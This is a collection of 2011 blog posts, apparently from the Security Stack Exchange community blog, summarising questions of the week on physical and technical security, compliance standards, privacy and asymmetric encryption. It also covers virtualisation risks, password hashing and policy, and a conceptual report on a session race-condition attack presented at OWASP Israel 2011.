QotW #14: How to secure an environment both physically and technically?

2011-12-16 by . 0 comments

So after a slight hiatus we are back running question of the week posts again. This time, chosen by me because we had a tie, is the question asked by user jwegner: How to secure an environment both physically and technically?

An interesting question when you may be working in a scenario processing personal data and cannot afford a data leak. So, as a very quick summary, jwegner had:

  • no local storage
  • used cctv cameras
  • used biometric locks and key-card locks
  • used sftp to transfer data in and out when necessary.

However, jwegner was still concerned about a number of issues including mobile phones, preventing data release when the rules need to be relaxed and the fact that their external gateway ran both an sftp server and an ftp server.

Security.se responded. Jeff Ferland has the highest voted answer. He recommended not allowing any mobile phone devices inside the secure area at all, as even in offline mode many phones have data ports and cameras and that the internet connection for the “red” zone was a no-go. However, on the subject of achieving no local storage with flash drives, Jeff recommended the opposite, citing loss of the drives as a big potential risk factor. Jeff continued to recommend that monitoring USB ports is a necessary precaution and possibly using epoxy to fill them – however, his answer also mentions that many devices are now highly reliant on the usb interface, including keyboards and mice.

On the ftp gateway area, Jeff recommended looking into access control to ensure internal accounts only had read access, and possibly using ProFTPd as opposed to the standard sftp subsystem. Finally, Jeff added an extra detail – using deep freeze to ensure machine config cannot persist reboot.

Rory Alsop echoed many of these sentiments in his answer. Over and above Jeff, Rory recommended banning mobiles with very strict consequences for their use inside the secure area as a deterrent – as well as enforcing searches on entry/exit. In addition, he recommended not using ftp at all. Rory also echoed Jeff’s deep freeze, recommending read-only file systems. Finally, his answer mentioned two key points:

  • Internal risks of using ftp – may be worth moving over to sftp to ensure internal traffic is harder to sniff.
  • Staff vetting.

From the comments, an interesting point was raised – blocking cellphones is illegal in the US and may be in other jurisdictions, so whilst detection methods could be used for enforcement outright blocking may require an in-depth review of options before proceeding.

So far, these are the only two answers. Our questions of the week aim to highlight potential interesting questions from the community; if you think you can help answer then the link you need is here.

Filed under Uncategorized

Some security implications of virtualisation

2011-12-07 by . 0 comments

I prepared this presentation for an ISACA event and realised it is applicable to a much wider audience:

The business benefits of virtualisation are fantastic in terms of costs savings, agility in delivering services and business resiliency.  It enables organisations to spend less on hardware assets  and use their existing hardware more efficiently by running multiple machines on a single piece of server hardware without significant degradation in performance. Industry and vendor studies indicate up to 50% savings in IT expenditure.

An organisation can also run just the number of servers they need at any time, with demand led increases possible at short notice simply by enabling a new virtual machine. This is a further driver for virtualisation today as data centre power costs are significant to any large organisation and a reduction in the number of servers needing power and cooling offers a direct saving in bottom line costs. Studies indicate savings in energy costs through server virtualisation can reach 75% for a typical mid-sized organisation.

What are the risks?

Segregation of systems and data

Security around the standard organisational architecture is quite well understood, with acceptance that there are layers of security based on risk or impact levels, or around the value placed on particular assets – a key end result being separation: keep unauthorised individuals out, restrict an individual’s access to that which they need to do their job and host data of differing sensitivity on networks with different levels of protection.

Virtualisation can break this model – imagine your HR database and customer database virtualised onto the same environment as your web servers. All of a sudden the data which was once hidden behind layers of firewalls and network controls may be vulnerable to a smart attacker who gains access to the web server and finds an exploitable vulnerability in the virtualisation layer.

The same is true for servers hosted for customers – in the past, good practice kept these separate where possible. Now the segregation between different customers may be no more than between adjacent areas of memory or hard disk. This may not be appropriate for environments with differing risk, threat or impact ratings, for example external web servers and internal databases.

This also means that all servers or applications in the same environment should be secured to the same level, which means patch management becomes very important.

Segregation of duties

Consolidation of systems also introduces a risk of a loss of segregation of duties (SOD).  It increases the risk that both system administrators and users could potentially (and unintentionally) gain access to data that are above their normal privilege levels. Administration of the internal virtual switch is also a concern, thus introducing a conflict between server administrators and network administrators and therefore potentially compromising the SOD between the two groups.

Licensing and asset management

The ability to rapidly deploy new virtual infrastructure at short notice raises challenges around licensing. Virtualising applications and servers is often implemented by copying an instance of a server and this instance is recreated on the virtual host. When further capacity is required new instances are created, but as these can be very time dependent, the licensing model has to be updated to ensure that an organisation only runs applications they own a licence to (or that don’t require a licence in a virtual environment.)

This applies also to inventory – a virtual server is just as much of an asset to the business as a physical server, but with the number of virtual servers fluctuating with demand, how do you manage your assets appropriately?

Resilience

Although virtualisation can improve resiliency, there is also a risk if implementation is flawed.  If several key services are hosted within the same physical device in a single virtual environment then failure of the hardware device would impact several services simultaneously.

When consolidating servers, consideration should be given to distributing business critical applications with high availability requirements across physical server instances. There should be no single point of failure for a service and the use of anti-affinity rules should be considered to ensure resilient virtual machines within a service are kept on separate infrastructure hosts.

Maturity of tools and security awareness

While some virtual environments (such as the IBM LPAR architecture on mainframes) are considered mature, there is now a range of products in this space which have not been through the same level of development and which run on platforms less suited to multiple user segregation, and while there has been large scale development of PaaS platforms based on Xen, VMware and others, treating these as secure by default may not be appropriate for your business.

Another major risk around security awareness is that virtualisation is moving forward in some organisations without the knowledge or active participation of Information Security.

Administrators need to look at the particular security requirements prior to building a virtual environment in order to use the correct tools and security configuration to support the business requirements in an appropriate manner.

Information Security involvement is critical at these early planning and architecture decision stages.

Communication and Storage Security

Sensitive data being transmitted across networks should be encrypted where possible and supported by the hypervisor. Encryption should be implemented for traffic between the hypervisor, management networks and remote client sessions and MUST be for virtualised DMZ environments.

Virtual disks are used to store the operating system, applications and data and also record the state of the virtual machine. Virtual disks (including backed up copies) must be protected from unauthorised modification.

Where virtual disk password protection features exist, they should be enabled.

Restrict disk shrinking features which allow non-privileged users and processes to reclaim unused virtual disk space as this may cause denial of service to legitimate users and processes.

Auditing, logging and monitoring

Enable security logging and monitoring on all virtual machines and hypervisors according to approved operational standards.

Hypervisors must be configured, at a minimum to log (failed and successful) login attempts to management interfaces.

Activities of privileged hypervisor and VM accounts (for example, the creation, modification and deletion of roles) must be logged and reviewed.

Summary

  • Understand all the key IT controls in the existing environment before virtualisation
  • Understand virtual platform controls and configure for security
  • Replicate IT controls in the virtualised environment
  • Implement an asset management system which can cope with high volatility
  • Work with software and hardware vendors to understand licensing implications
  • If outsourcing to a cloud vendor, choose one that can match your data location requirements and build in a robust reporting framework
  • Rearrange your support teams to suit the new environment, but during the transition it is likely that the learning curve will be steep as new tools are used, and back office and front office support teams are created anew
  • Use a compliance and governance model which can manage the concepts of changing security boundaries and levels
  • Ideally work with a service provider who has done it before!

Filed under Risk, Virtualisation

QotW #13: Standards for server security, besides PCI-DSS?

2011-11-11 by . 0 comments

The Question of the week this week was asked by nealmcb in response to the ever wider list of standards which apply in different industries. The Financial Services industry has a well defined set of standards including the Payment Card Industry Data Security Standard (PCI-DSS) which focuses specifically on credit card data and primary account numbers, but neal’s core question is this:

Are there standards and related server certifications that are more suitable for e.g. web sites that hold a variety of sensitive personal information that is not financial (e.g. social networking sites), or government or military sites, or sites that run private or public elections?

This question hasn’t inspired a large number of answers, which is surprising, as complying with security standards is becoming an ever more important part of running a business.

The answers which have been provided are useful, however, with links to standards provided by the following:

From Gabe:

Of these, the CIS standards are being used more and more in industry as they provide a simple baseline which should be altered to fit circumstances but is a relatively good starting point out of the box.

Jeff Ferland provided a longer list:

And as I tend to be pretty heavily involved with the ISF, I included a link to the Standard of Good Practice which is publicly available and is exactly what it sounds like: rational good practice in security.

From all these (and many more) it can be seen that there is a wide range of standards which all have a different focus on security- which supports this.josh‘s comment:

As is often noted in questions and answers on this site, the solution depends on what you are protecting and who you are protecting it from. Even similar industries under different jurisdictions may need different protections. Thus I think it makes sense for specific industries and organizations to produce their own standards.

A quick look at questions tagged Compliance shows discussion on Data Protection Act, HIPAA, FDA, SEC guidelines, RBI and more.

If you are in charge of IT or Information Security, Audit or Risk, it is essential that you know which standards are appropriate to you, which ones are mandatory, which are optional, which may be required by a business partner etc., and to be honest it can be a bit of a minefield.

The good thing is – this is one of the areas where the Stack Exchange model works really well. If you ask the question “Is this setup PCI compliant” there are enough practitioners, QSA’s and experienced individuals on the site that an answer should be very straightforward. Of course, you would still need a QSA to accredit, but as a step towards understanding what you need to do, Security.StackExchange.com proves its worth.

Filed under Standards

Why passwords should be hashed

2011-11-01 by . 3 comments

How passwords should be hashed before storage or usage is a very common question, always triggering passionate debate. There is a simple and comprehensive answer (use bcrypt, but PBKDF2 is not bad either) which is not the end of the question since theoretically better solutions have been proposed and will be worth considering once they have withstood the test of time (i.e. “5 to 10 years in the field, and not broken yet”).

The less commonly asked question is:

why should a password be hashed?

This is what this post is about.

Encryption and Hashing

A first thing to note is that there are many people who talk about encrypted passwords but really mean hashed passwords. An encrypted password is like anything else which has been encrypted: it has been rendered unreadable through a process which used an extra piece of secret data (the key) and which can be reversed with knowledge of the same key (or of a distinct, mathematically related key, in the case of asymmetric encryption). For password hashing, on the other hand, there is no key. The hashing process is like a meat grinder: there is no key, everybody can operate it, but there is no way to get your cow back in full moo-ing state. Whereas encryption would be akin to locking the cow in a stable. Cryptographic hash functions are functions which anybody can compute, efficiently, over arbitrary inputs. They are deterministic (same input yields same output, for everybody).

In shorter words: if MD5 or SHA-1 is involved, this is password hashing, not password encryption. Let’s use the correct term.

Once hashed, the password is still quite useful, because even though the hashing process is not reversible, the output still contains the “essence” of the hashed password and two distinct passwords will yield, with very high probability (i.e. always, in practice), two distinct hashed values (that’s because we are talking about cryptographic hash function, not the other kind). And the hash function is deterministic, so you can always rehash a putative password and see if the result is equal to a given hash value. Thus, a hashed password is sufficient to verify whether a given password is correct or not.

This still does not tell us why we would hash a password, only that hashing a password does not forfeit the intended usage of authenticating users.

To Hash or Not To Hash ?

Let’s see the following scenario: you have a Web site, with users who can “sign in” by showing their name and password. Once signed in, users gain “extra powers” such as reading and writing data. The server must then store “something” which can be used to verify user passwords. The most basic “something” consists in the password themselves. Presumably, the passwords would be stored in a SQL database, probably along with whatever data is used by the application.

The bad thing about such “cleartext” storage of passwords is that it induces a vulnerability in the case of an attack model where the attacker could get a read-only access to the server data. If that data includes the user passwords, then the villain could use these passwords to sign in as any user and get the corresponding powers, including any write access that valid users may have. This is an edge case (attacker can read the database but not write to it). However, this is a realistic edge case. Unwanted read access to parts of a Web server database is a common consequence of an SQL injection vulnerability. This really happens.

Also, the passwords themselves can be a prized spoil of war: users are human beings, they tend to reuse passwords across several systems. Or, on the more trivial aspect of things, many users choose as password the name of their girlfriend/boyfriend/dog. So knowing the password for a user on a given site has a tactical value which extends beyond that specific site, and even having an accidental look at the passwords can be embarrassing and awkward for the most honest system administrator.

Storing only hashed passwords solves these problems as best as one can hope for. It is unavoidable that a complete dump of the server data yields enough information to “try” passwords (that’s an “offline dictionary attack”) because the dump allows the attacker to “simulate” the complete server on his own machines, and try passwords at his leisure. We just want that the attacker may not have any faster strategy. A hash function is the right tool for that. In full details, the hashing process should include a per-password random salt (stored along the hashed value) and be appropriately slow (through thousands or millions of nested iterations), but that’s not the subject of this post. Just use bcrypt.

Summary: we hash passwords to prevent an attacker with read-only access from escalating to higher power levels. Password hashing will not make your Web site impervious to attacks; it will still be hacked. Password hashing is damage containment.

A drawback of password hashing is that since you do not store the passwords themselves (but only a piece of data which is sufficient to verify a password without being able to recover it), you cannot send back their passwords to users who have forgotten them. Instead, you must select a new random password for them, or let them choose a new password. Is that an issue ? One could say that since the user forgot his old password, then that password was not easy to remember, so changing it is not a bad thing after all. Users are accustomed to such a procedure. It may surprise them if you are able to send them back their password. Some of them might even frown upon your lack of security savviness if you so demonstrates that you do not hash the stored passwords.

Filed under Authentication, Crypto, Password

How long is a password string?

2011-10-18 by . 1 comments

Password policy questions are a perennial fixture of IT Security stack exchange, and take many forms.

Take, for example, the recent XKCD comic on the subject:

Shortly after it was posted, user Billy ONeal asked directly whether the logic was sound: Is a short complex password or a long dictionary passphrase better? You will find answers that support either conclusion, as well as answers that put the trade-offs involved into context.

Of course, part of knowing how easy a password is to crack is knowing how a password cracker works. Are there state of the art techniques or theory specifically for attacking pass phrases? Are there lists of the most common words or ngrams used in passwords and pass phrases?

So we’ve got no consistent idea about what constitutes a “good” password, although we can probably guess at what weak passwords will fall first. But then who is responsible for deciding a user’s password strength? Pretend for a moment that we agree what a strong password is. Should we stop users from choosing “weak” passwords, or is it their own fault for not understanding information theory and the entropy content of their chosen string of characters?

The definitive answer is “it depends”. It depends on how valuable the assets being protected by password access are. It depends on whether the value is appreciated by you as service provider/systems administrator, or by the user as customer/asset owner (or by a combination of those roles, or by someone else). It depends on how much inconvenience you’re willing to put your users to, and on how much inconvenience your users are willing to accept.

So, you’ve decided that you do want to enforce a policy. How does that work? Some websites enforce a maximum password length, is that a good idea?. Should passwords be truly random?

To summarise the discussion this far: there are different ideas of what makes a good password, of who is responsible for deciding whether a password is good or bad, and of how to enforce good passwords once you do decide you want to. But all of this discussion has already put the cart before the horse. Are your passwords going to be brute-force, or will the attacker use a key logger? Maybe they’ll attack the password where it’s stored?.

Indeed, while we’re asking the big questions, why passwords at all? Might biometric identification be better? Why not just forget all of this complication over strong passwords and start taking fingerprints instead? Some reasons include the possibility of false positives from the biometrics system (who hasn’t tried holding up a photograph to a facial recognition system?), and the icky disgustingness of some other attacks.

Suffice it to say that the problem of password security is a complex one, but one that the denizens of security.stackexchange.com enjoy tackling.

Filed under Authentication, Password, Risk

QotW #12: How to counter the statement: “You don’t need (strong) security if you’re not doing anything illegal”?

2011-10-10 by . 0 comments

Ian C posted this interesting question, which does come up regularly in conversation with people who don’t deal with security on a daily basis, and seems to be highlighted in the media for (probably) political reasons. The argument is “surely as long as you aren’t breaking the law, you shouldn’t need to prevent us having access – just to check, you understand”

This can be a very emotive subject, and it is one that has been used and abused by various incumbent authorities to impose intrusions on the liberty of citizens, but how can we argue the case against it in a way the average citizen can understand?

Here are some viewpoints already noted – what is your take on this topic?

M’vy made this point from the perspective of a business owner:

Security is not about doing something illegal, it’s about someone else doing something illegal (that will impact you).

If you don’t encrypt your phone calls, someone could know about what all your salesman are doing and can try to steal your clients. If you don’t shred your documents, someone could use all this information to mount a social engineering attack against your firm, to steal R&D data, prototype, designs…

Graham Lee supported this with a simple example:

 Commercial confidential data…could provide competitors with an advantage in the marketplace if the confidentiality is compromised. If that’s still too abstract, then consider the personal impact of being fired for being the person who leaked the trade secrets.

So we can easily see a need for security in a commercial scenario, but why should a non-technical individual worry? From a more personal perspective, Robert David Graham pointed this out

 As the Miranda Rights say: “anything you say can and will be used against you in a court of law”. Right after the police finish giving you the Miranda rights, they then say “but if you are innocent, why don’t you talk to us?”. This leads to many people getting convicted of crimes because it is indeed used against them in a court of law. This is a great video on YouTube that explains in detail why you should never talk to cops, especially if you are innocent: http://www.youtube.com/watch?v=6wXkI4t7nuc

Tate Hansen‘s thought is to ask,

“Do you have anything valuable that you don’t want someone else to have?”

If the answer is Yes then follow up with “Are you doing anything to protect it?”

From there you can suggest ways to protect what is valuable (do threat modeling, attack modeling, etc.).

But the most popular answer by far was from Justice:

You buy a lock and lock your front door if you live in a city, in close proximity to hundreds of thousands of others. There is a reason for that. And it’s the same reason why you lock your Internet front door.

Iszi asked a very closely linked question “Why does one need a high level of privacy/anonymity for legal activities”, which also inspired a range of answers:

From Andrew Russell, these 4 thoughts go a long way to explaining the need for security and privacy:

If we don’t encrypt communication and lock systems then it would be like:

Sending letters with transparent envelopes. Living with transparent clothes, buildings and cars. Having a webcam for your bed and in your bathroom. Leaving unlocked cars, homes and bikes.

And finally, from the EFF’s privacy page:

Privacy rights are enshrined in our Constitution for a reason — a thriving democracy requires respect for individuals’ autonomy as well as anonymous speech and association. These rights must be balanced against legitimate concerns like law enforcement, but checks must be put in place to prevent abuse of government powers.

A lot of food for thought…

Filed under Business, Risk, Uncategorized

Risk Assessments: Knowing What to Protect

2011-10-04 by . 0 comments

A company’s data is as much a risk as it is an asset. The way that customer data is stored in modern times requires it to be protected as a vulnerable asset and regarded as an unrealized liability even if not considered on the annual financial statement. In many jurisdictions this is enforced by legislation (eg Data Protection Act of 1998 in the UK)

One of the challenges of this as a modern concern lies in knowing where your data is.

To make a comparable example, consider a company that owns its place of operation. That asset must be protected with an investment both for sound business sense and by regulatory requirement. Fire protection, insurance, and ongoing maintenance are assumed costs that are considered all but mandatory. A company that isn’t covering those costs is probably not standing on all its legs. The loss of a primary building because of inadequate investment in protection and maintenance could be anywhere from a major event to fatal to the company.

It may seem a surreal comparison, but data exposure can have an impact as substantial as losing a primary building. A bank without customer records is dead regardless of the cash on hand. A bank with all its customer records made public is at risk of the same fate. Illegitimate transactions, damage to reputation, liability for customer losses related to disclosure and regulatory reaction may all work together to end an institution.

Consider how earlier this year Sony’s Playstation online gaming network was hacked. In the face of this compromise Sony estimated their present losses at $171 million, suffered extended periods of service downtime, and suffered further breaches in attempting to restore service. Further losses are likely as countries around the world investigate the situation and consider fines. Private civil suits have also been brought in response to the breaches. To put the numbers in perspective, the division responsible for the Playstation network posted a 2010 loss of approximately $1 billion dollars.

In total (across several divisions), Sony suffered at least 16 distinct instances of data loss or unintended access including an Excel file containing sweepstakes data from 2001 that Sony posted online. No compromise was needed for that particular failure — the file was readily available and indexed by Google. In the end, proprietary source code, administrator credentials, customer birthdays, credit card information, telephone numbers and home addresses were all exposed.

In regards to Sony’s breaches, the following question was posed, “If you were called by Sony right now, had 100% control over security, what would you do in the first 24-hours?” The traditional response is isolating breaches, identifying them, restoring service with the immediate attack vectors closed, and shoring up after that. However, from the outside Sony’s issue appears to be systemic. Their systems are varied, complicated, and numerous. Weaknesses appear to be everywhere. They were challenged in returning to a functioning state because even they were not compromised in an isolated way. Isolating and identifying breaches was far as one could get in those first 24 hours. Indeed, a central part of the division’s core revenue business was out of service for roughly 3 weeks.

The root issue behind everything is likely that Sony isn’t aware of their assets. Everything grew in place organically and they didn’t know what to protect. Sony claims it encrypted its credit card data, but researchers have found numbers related to the attack. Other identifying information wasn’t encrypted. Regardless of the circumstances related to the disclosure of credit card data, Sony failed protect other valuable information that can make it liable for fraud. Damage to Sony’s reputation and regulatory reaction, including Japan preventing restarting the service there at least through July, are additional issues.

The lack of awareness about what data is at risk can impact a business of any size. Much as different types of fire protection are needed to deal with an office environment, outdoor tire storage at an auto shop, a server room and a chemical factory, different types of security need to be applied to your data based on its exposure. Water won’t work on a grease fire, and encrypting a database has no value if a query can be run against it to retrieve all the information without encryption. While awareness is acute about credit card sensitivity, losing names, addresses, phone numbers and dates of birth can present just as much risk for fraud and civil or regulatory liability. This is discussed in ‘Data Categorisation – critical or not?’ and should be a key step in any organisation’s plans for resilience.

Filed under Business, Risk

QotW #11: Is it possible to have a key for encryption, that cannot be used for decryption?

2011-09-30 by . 0 comments

This week’s question of the week was asked by George Bailey, who wanted to know if it were possible to have a key for encryption that could not be used for decryption. This seems at first sight like a simple question, but underneath it there are some cryptographic truths that are interesting to look at.

Firstly, as our first answerer SteveS pointed out, the process of encrypting data according to this model is asymmetric encryption. Steve provided links to several other answers we have. First up from this list was asymmetric vs symmetric encryption. From our answers there, public key cryptography requires two keys, one that can only encrypt material and another which can decrypt material. As was observed in several answers, when compared to straightforward symmetric encryption, the requirement for the public key in public key cryptography creates a large additional burden that depends heavily on careful mathematics, while symmetric key encryption really relies on the confusion and diffusion principle outlined in Shannon’s 1949 Communication Theory of Secrecy Systems. I’ll cover some other points raised in answers later on.

A similarly excellent source of information is what are private and public key cryptography and where are they useful?

So that answered the “is it possible to have such a system” question; the next step is how. This question was asked on the SE network’s Crypto site – how does asymmetric encryption work?. In brief, in the most commonly used asymmetric encryption algorithm (RSA), the core element is a trapdoor function or permutation – a process that is relatively trivial to perform in one direction, but difficult (ideally, impossible, but we’ll discuss that in a minute) to perform in reverse, except for those who own some “insider information” — knowledge of the private key being that information. For this to work, the “insider information” must not be guessable from the outside.

This leads directly into interesting territory on our original question. The next linked answer was what is the mathematical model behind the security claims of symmetric ciphers and hash algorithms. Our accepted answer there by D.W. tells you everything you need to know – essentially, there isn’t one. We only believe these functions are secure based on the fact no vulnerability has yet been found.

The problem then becomes: are asymmetric algorithms “secure”? Let’s take RSA as example. RSA uses a trapdoor permutation, which is raising values to some exponent (e.g. 3) modulo a big non-prime integer (the modulus). Anybody can do that (well, with a computer at least). However, the reverse operation (extracting a cube root) appears to be very hard, except if you know the factorization of the modulus, in which case it becomes easy (again, using a computer). We have no actual proof that factoring the modulus is required to compute a cube root; but more of 30 years of research have failed to come up with a better way. And we have no actual proof either that integer factorization is inherently hard; but that specific problem has been studied for, at least, 2500 years, so easy integer factorization is certainly not obvious. Right now, the best known factorization algorithm is General Number Field Sieve and its cost becomes prohibitive when the modulus grows (current World record is for a 768-bit modulus). So it seems that RSA is secure (with a long enough modulus): breaking it would require to outsmart the best mathematicians in the field. Yet it is conceivable that a new mathematical advance may occur any day, leading to an easy (or at least easier) factorization algorithm. The basis for the security claim remains the same: smart people spent time thinking about it, and found no weakness.

Cryptography offers very few algorithms with mathematically proven security (e.g. One-Time Pad), let alone practical algorithms with mathematically proven security; none of them is an asymmetric encryption algorithm. There is no proof that asymmetric encryption can really exist. But there is no proof that hash functions exist, either, and it never prevented anybody from using hash functions.

Blog promotion afficionado Jeff Ferland provided some extra detail in his answer. Specifically, Jeff addressed which cipher setup should be used for actually encrypting the data, noting that the best setup for most real world scenarios is the combined use of asymmetric and symmetric cryptography as occurs in PGP, for example, where a transfer key encrypts the data using symmetric encryption and that key, a much smaller piece of data, can be effectively be protected by asymmetric encryption; this is often called “hybrid encryption”. The reason asymmetric encryption is not used throughout, aside from speed, is the padding requirement as Jeff himself and this question over on Crypto.SE discusses.

So in conclusion, it is definitely possible to have a key that works only for encryption and not for decryption; it requires mathematical structure, and faith in the difficulty of inverting some of these operations. However, using asymmetric encryption correctly and effectively is one of the biggest challenges in the security field; beyond the maths, private key storage, public key distribution, and key usage without leaking confidential information through careless implementation are very difficult to get right.

Filed under Crypto, News

QotW #10: Carrying Out an IT Audit

2011-09-23 by . 0 comments

This week, a newly-minted master’s degree holder asked on our site, “[How do I go about] Carrying out a professional IT audit procedure?” That’s a really big question in one sentence. In trying to break that down to some parts we can address, let’s look at the perspective people involved in an audit might see.

Staff at an audit client interact with auditors who ask a lot of questions off of a script that is usually referred to as a work plan. Many times, they ask you to open the appropriate settings dialogs or configuration files and show them the configuration details that they are interested in. Management at an audit client will discuss what systems beforehand and the managers for the auditors will select or create appropriate work plans.

The quality, nature, and scope of work plans vary widely, and a single audit will often involve the use of many different plans. Work plans might be written by the audit company or available from regulatory bodies, standards organizations, or software vendors. One example of a readily-available plan is the PCI DSS 2.0 standard. That plan displays both high-level overviews and mid-level configuration requirements across a broad spectrum. Low-level details would be operating system or application specific. Many audit plans related to banking applications have granular detail about core system configuration settings. Also have a look at this question about audit standards for law firms for an example from a different industry showing similarities and differences.

While some plans are regulatory-compliance related, most are best-practices focused. All plans are written with best practices in mind, and for those who are new to the world of IT security, that’s the most challenging part about them. There is no universal standard; many plans greatly overlap, but still differ. If the auditor is appropriately considering their client’s needs, they’ll almost certainly end up marking parts of plans as not applicable or not compliant yet okay because of mitigating circumstances.

Another challenging point for those new to auditing is the sometimes hard-to-grasp concept is the separation between objectives and controls. An objective might be to ensure that each authenticates to their own account. Controls listed in a work plan might include discussion about password expiry requirements to help prevent shared account passwords (among other things). Don’t get crossed-up focusing on the control if the objective is met through some other means – perhaps everybody is using biometric authentication instead. There are too many instances of this in the audit world, and it’s a common mistake among newer auditors.

From a good auditor’s perspective, meeting the goals of the work plan might be considered 60% of the goal of the work. An auditor’s job isn’t complete unless they’re looking at the whole organization. Some examples: to fulfill a question about password change requirements, the auditor should ask an administrator, see the configuration and ask users about it (“When was the last time the system made you change your password?”). To review a system setting, the auditor should ask to see settings in a general manner, adding detail only as needed: “Can you show me the net effect of policies on this user’s account?” as opposed to “Start->run->rsop.msc”. Users reporting different experiences about password resets than the system configuration shows or a system administrator who fumbles their way around for everything won’t ever be in the work plan, but it will be a concern.

With that background in mind, here are some general steps to performing an IT audit procedure:

  • Meet with management and determine their needs. You should understand many of the possible accepted risks before you begin the engagement. For example, high-speed traders may stand to lose more money by implementing a firewall than not.
  • Select appropriate audit plans based on available resources and your own relevant work.
  • Properly review the controls with the objectives they meet in mind. Use multiple references when possible, and always try to confirm any settings directly.
  • Pay attention to the big picture. Things should “feel right.”
  • Review your findings with management and consider their thoughts on them. Many times the apparent severity of something needs to be adjusted.
  • At the end of the day, sometimes a business unit may accept the risk from a weak control, despite it looking severe to you as an auditor. That is their prerogative, as long as you have correctly articulated the risks

The last part of that, auditors reviewing findings with client management, takes the most finesse and unexplainable skill. Does your finding really matter? How can you smooth things over and still deliver over 100 findings? At the end of the day, experience and repetition is the biggest part of delivering professional work, and that’s regardless of the kind of work.

Some further starting points for more detail can be found at http://en.wikipedia.org/wiki/Information_technology_audit_process and http://ithandbook.ffiec.gov/.

Filed under Business, Standards

OWASP Israel Conference 2011

2011-09-21 by . 0 comments

This past Thursday, OWASP Israel held their yearly regional conference, just before the larger global AppSec conference in US. The Interdisciplinary Center Herzliya (IDC) was gracious enough to host the conference.

Sec.se was a sponsor there, and in addition provided some great swag – lanyards for the speakers, stickers, and loads of very cool t-shirts (these were gone before the first lecture even started!) Quite a few attendees popped them straight on, and I heard a lot of compliments on the logo design (thanks @Jin!!). Btw, Sec.se didn’t just sponsor the conference – they’re now full OWASP Members, so kudos to the fellows at StackExchange, Inc.! (Still leaves the issue of which OWASP project to sponsor, please share your opinion there!)

There were quite a few sponsors this year, and that enabled us (disclosure: I am a Board Member of the Israel chapter) to put on the biggest regional conference yet: with approximately 500 attendees – including both security professionals and developers – and tracks in parallel, a total of 14 talks, it was a definite success.

It was also a great opportunity for networking, as there were people from all sorts of companies there: security product vendors, other software companies, security consulting firms, government/military, academia… very wide and varied.

The only drawback for me, was missing half the talks – and, running back and forth between the rooms to catch my preferred talks Smile.

Here’s a quick rundown of the the talks I was able to get into, note that most of the presentations are online at https://www.owasp.org/index.php/OWASP_Israel_2011 (and pretty much all of them are actually in English 😉 ).

Opening Words

Ofer Maor, Chapter Chairman, introduced OWASP for those that are new to it: now celebrating 10 years, OWASP is the foremost authority on application security, and provides some great resources to aid developers in creating amazing applications that are also secure. One of the main resources, among the various guides, is the OWASP Top Ten – this is “a broad consensus about what the most critical web application security flaws are.” There are also many open source security projects.

OWASP IL is celebrating its 5th year, and is currently one of the largest chapters… The OWASP IL chapter is also working on translating and updating the OWASP Top 10 into Hebrew (if this is your native language – please give a hand!)

Dr. Anat Bremmler, rep of the IDC, spoke about her commitment to security – her background is in network security, and she believes strongly in appsec. This is why this is the 6th OWASP conference that is taking place in the IDC. On a personal note, I would like to point out that the combination between the industry, specifically the security community, and academia, is a fantastic situation, and will have some wonderful results. Already, students in the IDC usually offer a presentation on some applicable research, as a result of their classwork. OWASP has interest in pushing security education all the way to universities, colleges, and such.

 

Keynote: Composite Applications Over Hybrid Clouds – Enterprise Security Challenges of the IT Supply Chain

Dr. Ethan Hadar, SVP of Corporate Technical Strategy at CA, gave a lightweight keynote address, discussing some challenges in combining the benefits from moving to Cloud Computing for supply chain management, and security requirements and needs. While he really didn’t say anything new, he presented the viewpoint of a CIO, who doesn’t really care much about security, except for compliance issues. Contrast this with other perspectives, such as that of a security manager, an auditor, and the end user… Often, it is the perception of security that matters, and not the actual level of security. While we in the security field would often dismiss that as “security theater”, Dr. Hadar made the case that for some shareholders, this might be what brings the buy-in.

He also brought up an interesting issue, regarding testing “composite applications” (i.e. systems that comprise 3rd party services) or apps hosted on “cloud infrastructure”: how can you test the sub-services? What if these are hosted on IaaS/PaaS/ *aaS etc? Are you even allowed to? In what country? What if your meta-system relies on 3rd party service? What can you do about change management – on the subsystems?

And whose responsibility is it, anyway? Dr. Hadar suggested including security in the contractual SLA…

But then, there are also short-lived apps – what he calls “situational applications”, such as a department pops up a website for a short timeframe.

Overall, not really anything new – but it was more about presenting the questions, providing food for thought…

The CIO doesn’t want security, its like talking to an insurance agent – just something you have to do, we should be making it as painless as possible.

 

Temporal Session Race Conditions

Shay Chen, CTO of Ernst and Young’s Hacktics Advanced Security Center, demoed a new class of attack he’s calling “Temporal Session Race Condition”.

Shay attempted to login to a simple webapp, without a valid password. He overloaded the password field with too much data, causing a momentary delay… In the meantime, he opened another window and tried to jump directly to an internal page. This created a sort of race condition on the session management…

Typically, race conditions would imply some form of latency, causing the intended order of operations to change, or become unpredictable.… In this case, even with no latency extant, the attempt is to create the latency, as needed, in order to enable the attacker to force the race condition.

The success of this attack can be based on what Shay calls “Session Puzzling”. This attack is kinda complex, but in certain scenarios can allow the attacker to subvert the session generation. For example, a webserver will generate a new session id, associate the session id with the memory area, and then store the session id. Of course, this session id is sent to the user’s browser (typically via a cookie, using a Set-Cookie header), which is then reused to find the session memory.

In a Session Puzzle attack, the web app accidentally stores a special flag in the session memory – e.g. in a multi-phase password recovery process. This flag might (and often is) the same flag that is checked by the rest of the application to verify that the user is logged in (for example, a session variable called, surprisingly, “username”).

While this is a relatively simplistic scenario (note that while it shouldn’t happen, it often does, sadly enough) – the more general case, of multi-phase flow control stored in session variables, is quite common. If the session variables used to store the flow control are the same variables used elsewhere, this can be subverted by running two flows, in parallel, without advancing the flow in the expected order (i.e. stop flow A after the first step, then commence flowB and continue through till the end). Likewise, it can be possible in some cases to skip steps in the flow, and jump ahead to a more interesting step – such as the phase where the password can be retrieved.

Shay then went on to discuss techniques to control what he calls “productive latency” – i.e. controlling how much time a specific line of code should take. This will increase the window of opportunity to inject a specific RC, even in cases where (flow-based) Session Puzzling does not apply. For example, what if the logon mechanism stores the username in the session, before verifying the password – and if the password is incorrect, the session is invalidated (in the same function)? This is not a multi-step flow, however by injecting the productive latency, it will be possible to create a race condition (by jumping to an internal page, during the authentication attempt).

These “productive latency” inducing techniques include Regex’s, loops, complex queries, and database connection pool exhaustion. He also introduced a tool (and who doesn’t love tools?) to flood a data access web page, and forcefully occupy the entire connection pool for a given amount of time…

Btw, he also mentioned architecture of two separate systems, that share a backend resource – one app might be able to saturate the backend connections, thus creating latency for the other app.

